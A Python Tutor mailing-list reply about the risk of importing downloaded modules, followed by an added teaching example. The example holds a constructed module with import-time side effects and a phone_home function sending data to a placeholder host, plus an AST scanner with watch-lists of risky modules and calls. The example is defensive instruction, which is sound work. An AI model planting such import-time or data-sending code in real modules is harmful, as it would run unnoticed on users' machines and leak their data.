[Tutor] functions

alan.gauld@bt.com alan.gauld@bt.com
Tue, 29 Jan 2002 11:03:10 -0000


> This seems important to understand in general too.  Is it 
> possible for someone to write a module and publish it 

Of course, that's what's on Useless Python and the 
Vaults of Parnassus - lots of published modules that 
you can download.

> can come along, download it, and import it -- and then it 
> turns out that the module executes some malicious code 
> on their system?  

Absolutely, caveat emptor.
You should always check and understand modules that you 
download.

> would be wise to read the source of anything that you don't know for 
> sure about.  But if I invoked python (in Unix), wouldn't the Python 
> interpreter then inherit my own environment variables, 
> therefore being able to perform actions within my account 
> that otherwise it would not be able to do?  

No, the interpreter remains exactly the same. But if the module
was malicious it could run under the interpreter and scrape off 
a list of valid user IDs for your system and mail them to 
somebody, say.... or more directly just delete all the files on 
your disk!


> I am talking about a Trojan Horse.

No, nothing so subtle. Just malicious code that you naively 
downloaded and ran. It's no different to blindly downloading 
an EXE from a web site and running it - you just hope it 
does what it says on the label. The difference with Python 
modules is at least you can read the code!

Alan g.
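The two points Alan makes above, that merely importing a module runs its top-level code under your own user account, and that with Python you can at least read the code before you do, are shown below as an added example that is not part of the original post or of any real module. SAMPLE_MODULE is a constructed stand-in for a "downloaded" module; the names scan_source, import_runs_code, the watch-lists and the module name "downloaded" are hypothetical. The static scan uses only ast.parse, so it never executes the file it inspects.

```python
import ast
import importlib
import os
import sys
import tempfile

# Constructed stand-in for a module you just downloaded.  It offers an
# honest-looking API, but its top-level code runs the moment it is imported
# (here it only drops a marker file; a hostile module could mail /etc/passwd
# or delete your files instead).  Everything in it is hypothetical.
SAMPLE_MODULE = '''
import os
import socket

def useful():
    return 42

def phone_home(data):
    # not run at import time, but it is there for whoever does call it
    with socket.create_connection(("example.invalid", 25)) as s:
        s.sendall(data)

# Top-level statement: executes during "import downloaded", before you
# have called anything.
with open(os.path.join(os.path.dirname(__file__), "imported.marker"), "w") as f:
    f.write("import-time code ran")
'''

# Heuristic watch-lists for the static scan; extend to taste.
SUSPECT_MODULES = {"os", "subprocess", "socket", "shutil", "smtplib", "ftplib"}
SUSPECT_CALLS = {"system", "popen", "remove", "unlink", "rmtree",
                 "create_connection", "exec", "eval", "__import__"}


def scan_source(source):
    """Inspect module source WITHOUT executing it.

    Returns (top_level, imports, calls):
      top_level - AST node types at module scope that run on import
                  (everything except def/class/import statements)
      imports   - imported modules that appear in SUSPECT_MODULES
      calls     - called names from SUSPECT_CALLS, anywhere in the file
    """
    tree = ast.parse(source)
    inert = (ast.FunctionDef, ast.AsyncFunctionDef, ast.ClassDef,
             ast.Import, ast.ImportFrom)
    top_level = [type(node).__name__ for node in tree.body
                 if not isinstance(node, inert)]
    imports, calls = set(), set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            imports.update(a.name.split(".")[0] for a in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module:
            imports.add(node.module.split(".")[0])
        elif isinstance(node, ast.Call):
            func = node.func
            name = func.attr if isinstance(func, ast.Attribute) else getattr(func, "id", None)
            if name in SUSPECT_CALLS:
                calls.add(name)
    return top_level, sorted(imports & SUSPECT_MODULES), sorted(calls)


def import_runs_code():
    """Write SAMPLE_MODULE to a temp dir, import it, and report whether its
    import-time side effect (the marker file) happened."""
    with tempfile.TemporaryDirectory() as tmpdir:
        with open(os.path.join(tmpdir, "downloaded.py"), "w") as f:
            f.write(SAMPLE_MODULE)
        sys.path.insert(0, tmpdir)
        try:
            importlib.invalidate_caches()
            importlib.import_module("downloaded")   # nothing called, code still ran
        finally:
            sys.path.remove(tmpdir)
            sys.modules.pop("downloaded", None)
        return os.path.exists(os.path.join(tmpdir, "imported.marker"))


if __name__ == "__main__":
    top_level, imports, calls = scan_source(SAMPLE_MODULE)
    print("runs at import time:", top_level)      # ['With']
    print("suspect imports:", imports)            # ['os', 'socket']
    print("suspect calls:", calls)                # ['create_connection']
    print("import executed the module's code:", import_runs_code())  # True
```

Reading the source the way scan_source does is the Python equivalent of Alan's "at least you can read the code": the scan tells you what will run the instant you type import, and which modules and calls deserve a closer look, without giving the file a chance to do anything. It is a heuristic, not a sandbox; a module that builds its calls dynamically will slip past a name-based watch-list, which is exactly why unfamiliar code should be read in full before it is imported.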